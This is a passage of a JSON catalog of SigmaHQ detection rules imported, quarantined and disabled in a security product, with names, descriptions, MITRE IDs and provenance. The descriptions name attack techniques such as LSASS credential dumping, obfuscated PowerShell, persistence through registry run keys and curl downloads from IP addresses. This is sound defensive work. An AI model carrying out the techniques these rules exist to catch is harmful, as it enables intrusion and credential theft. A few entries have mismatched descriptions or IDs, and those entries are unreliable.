"imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_sts_getcalleridentity_trufflehog.yml" } }, { "id": "sigmahq-sigma-9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", "type": "detection", "name": "End User Consent", "description": "Detects when an end user consents to an application", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/end-user-consent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_end_user_consent.yml" } }, { "id": "sigmahq-sigma-9b5de532-a757-4d70-946c-1f3e44f48b4d", "type": "detection", "name": "Shell Execution GCC - Linux", "description": "Detects the use of the \"gcc\" utility to execute a shell. 
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-gcc-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b5de532-a757-4d70-946c-1f3e44f48b4d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_gcc_shell_execution.yml" } }, { "id": "sigmahq-sigma-9b64de98-9db3-4033-bd7a-f51430105f00", "type": "detection", "name": "Windows Terminal Profile Settings Modification By Uncommon Process", "description": "Detects the creation or modification of the Windows Terminal Profile settings file \"settings.json\" by an uncommon process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-terminal-profile-settings-modification-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b64de98-9db3-4033-bd7a-f51430105f00", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/file/file_event/file_event_win_susp_windows_terminal_profile.yml" } }, { "id": "sigmahq-sigma-9b72b82d-f1c5-4632-b589-187159bc6ec1", "type": "detection", "name": "CodeIntegrity - Blocked Driver Load With Revoked Certificate", "description": "Detects blocked load attempts of revoked drivers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-blocked-driver-load-with-revoked-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml" } }, { "id": "sigmahq-sigma-9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "type": "detection", "name": "Invoke-Obfuscation Via Use MSHTA - Security", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-mshta-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" } }, { "id": "sigmahq-sigma-9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "type": "detection", "name": "LSASS Memory Access by Tool With Dump Keyword In Name", "description": "Detects LSASS process access requests from a source process with the \"dump\" keyword in its image name.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-memory-access-by-tool-with-dump-keyword-in-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_dump_keyword_image.yml" } }, { "id": "sigmahq-sigma-9bd04a79-dabe-4f1f-a5ff-92430265c96b", "type": "detection", "name": "Privilege Escalation via Named Pipe Impersonation", "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/privilege-escalation-via-named-pipe-impersonation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml" } }, { "id": "sigmahq-sigma-9c0295ce-d60d-40bd-bd74-84673b7592b1", "type": "detection", "name": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-encoded-and-obfuscated-reflection-assembly-load-function-call.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" } }, { "id": "sigmahq-sigma-9c14c9fa-1a63-4a64-8e57-d19280559490", "type": "detection", "name": "Invoke-Obfuscation Via Stdin", "description": "Detects Obfuscated Powershell via Stdin in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-stdin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" } }, { "id": "sigmahq-sigma-9c226817-8dc9-46c2-a58d-66655aafd7dc", "type": "detection", "name": "Modify User Shell Folders Startup Value", "description": "Detect modification of the User Shell Folders registry values for Startup or Common Startup which could indicate persistence attempts.\nAttackers may modify User Shell Folders registry keys to point to malicious executables or scripts that will be executed during startup.\nThis technique is often used to maintain persistence on a compromised system by ensuring that the malicious payload is executed automatically.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/modify-user-shell-folders-startup-value.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" } }, { "id": "sigmahq-sigma-9c5037d1-c568-49b3-88c7-9846a5bdc2be", "type": "detection", "name": "Suspicious Run Key from Download", "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-run-key-from-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" } }, { "id": "sigmahq-sigma-9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "type": "detection", "name": "Uncommon Child Process Of Appvlp.EXE", "description": "Detects uncommon child processes of Appvlp.EXE\nAppvlp or the Application Virtualization Utility is included with Microsoft Office. 
Attackers are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but it can also be abused to circumvent Attack Surface Reduction (ASR) file path rules\nor to mark a file as a system file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-of-appvlp-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-9c8acf1a-cbf9-4db6-b63c-74baabe03e59", "type": "detection", "name": "NTLM Brute Force", "description": "Detects device (workstation) names commonly used by NTLM brute-force tools in authentication events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntlm-brute-force.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" } }, { "id": "sigmahq-sigma-9c8afa4d-0022-48f0-9456-3712466f9701", "type": "detection", "name": "Tap Driver Installation - Security", "description": "Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tap-driver-installation-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c8afa4d-0022-48f0-9456-3712466f9701", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_tap_driver_installation.yml" } }, { "id": "sigmahq-sigma-9c8c7000-3065-44a8-a555-79bcba5d9955", "type": "detection", "name": "MSDT Execution Via Answer File", "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msdt-execution-via-answer-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "9c8c7000-3065-44a8-a555-79bcba5d9955", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msdt_answer_file_exec.yml" } }, { "id": "sigmahq-sigma-9ca2bf31-0570-44d8-a543-534c47c33ed7", "type": "detection", "name": "Potential DLL Sideloading Of DBGCORE.DLL", "description": "Detects DLL sideloading of \"dbgcore.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-dbgcore-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_dbgcore.yml" } }, { "id": "sigmahq-sigma-9cc85849-3b02-4cb5-b371-3a1ff54f2218", "type": "detection", "name": "File Download From IP URL Via Curl.EXE", "description": "Detects file downloads directly from IP address URL using curl.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-from-ip-url-via-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": 
{ "source": "SigmaHQ/sigma", "source_id": "9cc85849-3b02-4cb5-b377-700758f2f120", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml" } }, { "id": "sigmahq-sigma-9ccba514-7cb6-4c5c-b377-700758f2f120", "type": "detection", "name": "Suspicious Child Process of AspNetCompiler", "description": "Detects potentially suspicious child processes of \"aspnet_compiler.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-aspnetcompiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ccba514-7cb6-4c5c-b377-700758f2f120", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml" } }, { "id": "sigmahq-sigma-9cfc00b6-bfb7-49ce-9781-ef78503154bb", "type": "detection", "name": "Wlrmdr.EXE Uncommon Argument Or Child Process", "description": "Detects the execution of \"Wlrmdr.exe\" with the \"-u\" command line flag, which passes whatever follows it as an argument to the ShellExecute API and therefore allows an attacker to execute arbitrary binaries.\nThis detection also covers any uncommon child processes spawned from \"Wlrmdr.exe\", as a supplement for environments that possess \"ParentImage\" telemetry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wlrmdr-exe-uncommon-argument-or-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wlrmdr_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-9cfe4b27-1e56-48b4-b7a8-d46851c91a44", "type": "detection", "name": "MMC Executing Files with Reversed Extensions Using RTLO Abuse", "description": "Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1218.014", "T1036.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mmc-executing-files-with-reversed-extensions-using-rtlo-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9cfe4b27-1e56-48b4-b7a8-d46851c91a44", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mmc_rlo_abuse_pattern.yml" } }, { "id": 
"sigmahq-sigma-9d15044a-7cfe-4d23-8085-6ebc11df7685", "type": "detection", "name": "Potential Persistence Via Visual Studio Tools for Office", "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-visual-studio-tools-for-office.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml" } }, { "id": "sigmahq-sigma-9d3436ef-9476-4c43-acca-90ce06bdf33a", "type": "detection", "name": "DHCP Callout DLL Installation", "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dhcp-callout-dll-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" } }, { "id": "sigmahq-sigma-9d4548fa-bba0-4e88-bd66-5d5bf516cda0", "type": "detection", "name": "Masquerading as Linux Crond Process", "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/masquerading-as-linux-crond-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_masquerading_crond.yml" } }, { "id": "sigmahq-sigma-9d5a1274-922a-49d0-87f3-8c653483b909", "type": "detection", "name": "Uncommon System Information Discovery Via Wmic.EXE", "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-system-information-discovery-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d5a1274-922a-49d0-87f3-8c653483b909", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml" } }, { "id": "sigmahq-sigma-9d779ce8-5256-4b13-8b6f-b91c602b43f4", "type": "detection", "name": "Named Pipe Created Via Mkfifo", "description": "Detects the creation of a new named pipe using the \"mkfifo\" utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/named-pipe-created-via-mkfifo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d779ce8-5256-4b13-8b6f-b91c602b43f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml" } }, { "id": "sigmahq-sigma-9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "type": "detection", "name": "Computer System Reconnaissance Via Wmic.EXE", "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to 
obtain information about the machine such as the domain, username, model, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/computer-system-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_computersystem.yml" } }, { "id": "sigmahq-sigma-9d8f9bb8-01af-4e15-a3a2-349071530530", "type": "detection", "name": "Suspicious Path In Keyboard Layout IME File Registry Value", "description": "Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\nBefore doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. 
This registry key should store a value named \"Ime File\" with a DLL path.\nIMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-path-in-keyboard-layout-ime-file-registry-value.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d8f9bb8-01af-4e15-a3a2-349071530530", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_ime_suspicious_paths.yml" } }, { "id": "sigmahq-sigma-9db37458-4df2-46a5-95ab-307e7f29e675", "type": "detection", "name": "Exchange Set OabVirtualDirectory ExternalUrl Property", "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exchange-set-oabvirtualdirectory-externalurl-property.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9db37458-4df2-46a5-95ab-307e7f29e675", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" } }, { "id": "sigmahq-sigma-9db5446c-b44a-4291-8b89-fcab5609c3b3", "type": "detection", "name": "OpenCanary - VNC Connection Attempt", "description": "Detects instances where a VNC service on an OpenCanary node has had a connection attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-vnc-connection-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9db5446c-b44a-4291-8b89-fcab5609c3b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_vnc_connection_attempt.yml" } }, { "id": "sigmahq-sigma-9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "type": "detection", "name": "Remote Code Execute via Winrm.vbs", "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 